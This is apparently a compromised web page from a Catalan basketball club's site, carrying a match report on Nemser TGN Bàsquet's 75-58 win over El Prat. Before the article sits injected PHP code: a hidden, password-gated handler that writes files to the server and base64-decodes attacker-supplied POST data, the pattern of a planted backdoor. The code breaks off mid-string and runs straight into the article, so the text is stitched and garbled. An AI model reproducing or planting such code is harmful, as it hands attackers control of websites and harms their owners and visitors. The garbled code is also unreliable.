function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet en té prou amb l'últim quart per vèncer el Prat i seguir amb la ratxa (75-58) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet en té prou amb l’últim quart per vèncer el Prat i seguir amb la ratxa (75-58)

Updated: abril 18, 2015

El Nemser TGN Bàsquet va aconseguir la desena victòria consecutiva en un partit més complicat del que es podia esperar inicialment en veure l’arribada del seu rival. El Prat, un dels equips de la part mitjana alta de la classificació, va arribar al pavelló del Sagrat Cor amb només 6 jugadores i això va fer pensar que el matx podria ser senzill. Res més lluny de la realitat. El conjunt visitant va demostrar que, tot i el handicap de les rotacions, té qualitat de sobres i va posar les coses molt difícils a les noies de Jordi Hernández. Així, no va ser fins a l’últim període que la victòria es va veure de forma clara, tot i que el Nemser TGN Bàsquet havia anat per davant durant tot el matx.

La gran actuació de la jugadora del Prat López (28 punts, 19 abans d’arribar al descans), va posar contra les cordes les locals, que no trobaven el ritme de joc que les havia caracteritzat en les últimes jornades. Així, el tercer quart en va ser una bona prova, amb moltes dificultats per anotar, mentre que el Prat anava fent punts a bon ritme i, de pas, escurçant diferències (46-42).

Tot i que tothom esperava l’esgotament de les visitants pel fet de només tenir sis jugadores, la competitivitat del Prat va ser notable i hi va haver moments d’incertesa que, però, van ser resolts en un tres i no res per Ester Farré. La pivot va agafar les regnes del seu equip i amb un parell de cistelles seguides i una assistència va començar a decidir el matx. El parcial pel Nemser TGN Bàsquet va ser de 12-0 en dos minuts i mig (58-42) i el Prat va haver de demanar dos temps morts gairebé consecutius. Però no va poder fer res. Les locals havien posat la directa i el seu joc era el de sempre, ràpid, intens, demolidor. Les diferències van augmentar de pressa i la victòria, tot i que faltaven alguns minuts, estava assegurada (71-54 a 2:19 pel final).

El Nemser TGN Bàsquet continua en ratxa, suma deu triomfs seguits, és el millor conjunt de la segona volta i manté vives les opcions de superar el Vilanova (quart) i posar pressió al segon i el tercer.